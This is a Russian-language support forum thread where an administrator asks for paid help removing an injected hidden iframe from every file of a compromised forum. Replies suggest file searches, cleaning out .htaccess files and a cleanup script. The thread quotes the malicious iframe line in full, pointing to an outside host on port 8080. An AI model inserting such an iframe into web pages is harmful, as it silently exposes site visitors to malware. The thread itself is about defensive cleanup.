Перейти к содержимому
Русский язык для Invision Community 5

Нужная помощь

Форум был атакован спамерами, теперь в админцентре перебрасывает на ask.com

Нужно: проверить ВСЕ файлы на ftp на наличие в конце строки:

<iframe src="http://q1f.ru:8080/index.php" width=144 height=111 style="visibility: hidden"></iframe>

Удалить её.

Оплата по договорённости.

Писать: 829267

Изменено пользователем absurdum

Рекомендованные сообщения

А почему вы просто не скопируете все файлы сайта по ftp на свой компьютер и не зададите поиск в far определенного словосочетания или кода?

По-видимому, это вы мне писали на почту. Если нет — троян, вероятно, напхал вам в каждую директорию .htaccess файлов, фильтрующих определённую подстроку в GET-запросе. Удалите их и почти всё будет о'кей.

Zero108, это лишнее — проще сразу поискать на сервере. Есть масса решений, я в своё время просто скрипт написал — можно невозбранно пользоваться. :huh:

Zero108, это лишнее — проще сразу поискать на сервере. Есть масса решений, я в своё время просто скрипт написал — можно невозбранно пользоваться. :huh:

Хороший скрипт только требует аккуратного обращения иначе можно весь форум себе продырявить)))))

Хороший скрипт только требует аккуратного обращения иначе можно весь форум себе продырявить)))))

$autocure = false by defaults, остальное на страх и риск, да. Впрочем, замечание верное — добавлю в текст предупреждение. :(

• 2 месяца спустя...

Нужна помощь. Оплату гарантирую. Стучать 33906454ноль. Спасибо!

А что случилось?

Написал... Тишина...

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.